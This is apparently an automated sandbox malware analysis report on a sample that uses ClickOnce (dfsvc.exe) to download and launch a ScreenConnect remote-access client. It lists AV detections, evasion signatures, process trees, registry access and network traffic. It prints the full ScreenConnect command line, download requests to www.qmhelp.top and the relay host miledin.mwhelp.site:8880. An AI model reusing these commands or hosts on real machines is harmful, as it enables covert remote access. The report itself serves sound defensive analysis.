Windows Analysis Report
SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe

Overview

General Information

Sample name: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe
Analysis ID: 1638477
MD5: bfaaad29d18f516511ec1741e1a091db
SHA1: 39e2258863f4e1035568a16eec5def14cb602986
SHA256: b609603b40e7eb6d2dfdea9ea187eb82c1a7b55c85965f694548dd6cef36e9f5
Tags: exe, user-SecuriteInfoCom

Detection

ScreenConnect Tool
Score: 51
Range: 0 - 100
Confidence: 100%

Compliance

Score: 33
Range: 0 - 100

Signatures

Multi AV Scanner detection for submitted file
.NET source code references suspicious native API functions
Contains functionality to hide user accounts
Detected potential unwanted application
Reads the Security eventlog
Reads the System eventlog
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
One or more processes crash
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
Sigma detected: Potentially Suspicious Child Process Of ClickOnce Application
Stores large binary data to the registry
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe (PID: 8088 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe" MD5: BFAAAD29D18F516511EC1741E1A091DB)
    • dfsvc.exe (PID: 8124 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" MD5: B4088F44B80D363902E11F897A7BAC09)
      • ScreenConnect.WindowsClient.exe (PID: 5580 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe" MD5: AFA993C978BC52D51E8AF08A02892B4E)
        • ScreenConnect.ClientService.exe (PID: 7636 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=miledin.mwhelp.site&p=8880&k=BgIAAACkAABSU0ExAAgAAAEAAQC1BC7FdVJJFmJKDeQwCiJ3JJNEMl4x59nF7GGtNmjpuazxqDcF4oXznuaF7%2bPvugux9iQl0N%2fv66hQ12W0ZIEMc6tfjE3cMNDEOZODX53g06Q8bUHTzh2x%2f%2b%2bqrAZH38rwy8BEaezwgd3uPlgjgt802V5RYOIginnPSg2QEYJY4zP%2b13deRrkTtsV6UQI5iKxqWvcrjc%2fgnpsbKuxD%2f8jpqy4DtSBRMb9x3urpOt2zfLzMjV0lF10MnyNOj1gz6q1%2bFaQncjp2SQiX%2fLZxsoFe0atFkdojc3UhMzdhfUWSymENjpLdauviud8LLhJxAaEW8KIHkbGfg7iNE6VySqaj&r=&i=" "1" MD5: D3E628C507DC331BAB3DE1178088C978)
          • WerFault.exe (PID: 4068 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7636 -s 1304 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 1240 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8088 -s 316 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e\ScreenConnect.WindowsClient.exe | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

Source | Rule | Description | Author | Strings
00000009.00000000.1412836393.0000000000512000.00000002.00000001.01000000.0000000B.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000001.00000002.3055864006.000001D2D9943000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000001.00000002.3054816957.000001D2D980A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000009.00000002.1871815455.000000000286A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000001.00000002.3043338622.000001D2BF15F000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

Source | Rule | Description | Author | Strings
9.0.ScreenConnect.WindowsClient.exe.510000.0.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

System Summary

Source: Network Connection; Author: Nasreddine Bencherchali (Nextron Systems); Data: DestinationIp: 192.168.2.4, DestinationIsIpv6: false, DestinationPort: 49722, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Initiated: true, ProcessId: 8124, Protocol: tcp, SourceIp: 172.67.181.28, SourceIsIpv6: false, SourcePort: 443
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: C:\Windows\SysWOW64\WerFault.exe -u -p 7636 -s 1304, CommandLine: C:\Windows\SysWOW64\WerFault.exe -u -p 7636 -s 1304, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WerFault.exe, NewProcessName: C:\Windows\SysWOW64\WerFault.exe, OriginalFileName: C:\Windows\SysWOW64\WerFault.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=miledin.mwhelp.site&p=8880&k=BgIAAACkAABSU0ExAAgAAAEAAQC1BC7FdVJJFmJKDeQwCiJ3JJNEMl4x59nF7GGtNmjpuazxqDcF4oXznuaF7%2bPvugux9iQl0N%2fv66hQ12W0ZIEMc6tfjE3cMNDEOZODX53g06Q8bUHTzh2x%2f%2b%2bqrAZH38rwy8BEaezwgd3uPlgjgt802V5RYOIginnPSg2QEYJY4zP%2b13deRrkTtsV6UQI5iKxqWvcrjc%2fgnpsbKuxD%2f8jpqy4DtSBRMb9x3urpOt2zfLzMjV0lF10MnyNOj1gz6q1%2bFaQncjp2SQiX%2fLZxsoFe0atFkdojc3UhMzdhfUWSymENjpLdauviud8LLhJxAaEW8KIHkbGfg7iNE6VySqaj&r=&i=" "1", ParentImage: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe, ParentProcessId: 7636, ParentProcessName: ScreenConnect.ClientService.exe, ProcessCommandLine: C:\Windows\SysWOW64\WerFault.exe -u -p 7636 -s 1304, ProcessId: 4068, ProcessName: WerFault.exe
No Suricata rule has matched

AV Detection

Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe; Virustotal: Detection: 16%
Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe; ReversingLabs: Detection: 26%
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe; Code function: 0_2_00621000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00621000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe; EXE: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e\ScreenConnect.WindowsClient.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe; EXE: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsFileManager.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe; EXE: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsBackstageShell.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe; EXE: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.ClientService.exe

Compliance

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe; EXE: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e\ScreenConnect.WindowsClient.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe; EXE: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsFileManager.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe; EXE: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsBackstageShell.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe; EXE: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.ClientService.exe
Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe; Static PE information: certificate valid
Source: unknown; HTTPS traffic detected: 172.67.181.28:443 -> 192.168.2.4:49722 version: TLS 1.2
Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe; Code function: 0_2_00624B9B FindFirstFileExA,0_2_00624B9B
Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe; File opened: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\
Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe; File opened: C:\Users\user\AppData\Local\Apps\2.0\
Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe; File opened: C:\Users\user\AppData\Local\
Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe; File opened: C:\Users\user\AppData\Local\Apps\
Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe; File opened: C:\Users\user\AppData\
Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe; File opened: C:\Users\user\
Source: global traffic; TCP traffic: 192.168.2.4:63082 -> 62.182.86.171:8880
Source: global traffic; TCP traffic: 192.168.2.4:63074 -> 1.1.1.1:53
Source: global traffic; HTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=miledin.mwhelp.site&p=8880&k=BgIAAACkAABSU0ExAAgAAAEAAQC1BC7FdVJJFmJKDeQwCiJ3JJNEMl4x59nF7GGtNmjpuazxqDcF4oXznuaF7%2bPvugux9iQl0N%2fv66hQ12W0ZIEMc6tfjE3cMNDEOZODX53g06Q8bUHTzh2x%2f%2b%2bqrAZH38rwy8BEaezwgd3uPlgjgt802V5RYOIginnPSg2QEYJY4zP%2b13deRrkTtsV6UQI5iKxqWvcrjc%2fgnpsbKuxD%2f8jpqy4DtSBRMb9x3urpOt2zfLzMjV0lF10MnyNOj1gz6q1%2bFaQncjp2SQiX%2fLZxsoFe0atFkdojc3UhMzdhfUWSymENjpLdauviud8LLhJxAaEW8KIHkbGfg7iNE6VySqaj&r=&i= HTTP/1.1 Host: www.qmhelp.top Accept-Encoding: gzip Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1 Host: www.qmhelp.top Accept-Encoding: gzip
Source: global traffic; HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1 Host: www.qmhelp.top Accept-Encoding: gzip
Source: global traffic; HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1 Host: www.qmhelp.top Accept-Encoding: gzip
Source: global traffic; HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1 Host: www.qmhelp.top Accept-Encoding: gzip
Source: global traffic; HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1 Host: www.qmhelp.top Accept-Encoding: gzip
Source: global traffic; HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1 Host: www.qmhelp.top Accept-Encoding: gzip
Source: global traffic; HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1 Host: www.qmhelp.top Accept-Encoding: gzip
Source: global traffic; HTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1 Host: www.qmhelp.top Accept-Encoding: gzip
Source: global traffic; HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1 Host: www.qmhelp.top Accept-Encoding: gzip
Source: global traffic; HTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1 Host: www.qmhelp.top Accept-Encoding: gzip
Source: global traffic; HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1 Host: www.qmhelp.top Accept-Encoding: gzip
Source: global traffic; HTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1 Host: www.qmhelp.top Accept-Encoding: gzip
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown; TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficDNS traffic detected: DNS query: www.qmhelp.top
                  Source: global trafficDNS traffic detected: DNS query: miledin.mwhelp.site
                  Source: unknown; HTTPS traffic detected: 172.67.181.28:443 -> 192.168.2.4:49722, version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe; File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe; File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4

                  Spam, unwanted Advertisements and Ransom Demands

                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe; Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe; Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe; Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect

                  System Summary

                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe; PE Signature Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7636 -s 1304
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, PopoutPanelTaskbarButton.cs Task registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ProgramTaskbarButton.cs Task registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, TaskbarButton.cs Task registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: ScreenConnect.ClientService.dll0.1.dr, WindowsLocalUserExtensions.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: ScreenConnect.ClientService.dll.1.dr, WindowsLocalUserExtensions.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: classification engine Classification label: mal51.evad.winEXE@9/68@2/2
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Code function: 0_2_00621000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Deployment
                  Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8088
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe Mutant created: NULL
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\netfxeventlog.1.0
                  Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7636
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Command line argument: dfshim 0_2_00621000
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Virustotal: Detection: 16%
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe ReversingLabs: Detection: 26%
                  Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe"
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process created: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe Process created: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=miledin.mwhelp.site&p=8880&k=BgIAAACkAABSU0ExAAgAAAEAAQC1BC7FdVJJFmJKDeQwCiJ3JJNEMl4x59nF7GGtNmjpuazxqDcF4oXznuaF7%2bPvugux9iQl0N%2fv66hQ12W0ZIEMc6tfjE3cMNDEOZODX53g06Q8bUHTzh2x%2f%2b%2bqrAZH38rwy8BEaezwgd3uPlgjgt802V5RYOIginnPSg2QEYJY4zP%2b13deRrkTtsV6UQI5iKxqWvcrjc%2fgnpsbKuxD%2f8jpqy4DtSBRMb9x3urpOt2zfLzMjV0lF10MnyNOj1gz6q1%2bFaQncjp2SQiX%2fLZxsoFe0atFkdojc3UhMzdhfUWSymENjpLdauviud8LLhJxAaEW8KIHkbGfg7iNE6VySqaj&r=&i=" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7636 -s 1304
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8088 -s 316
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dfshim.dllJump to behavior
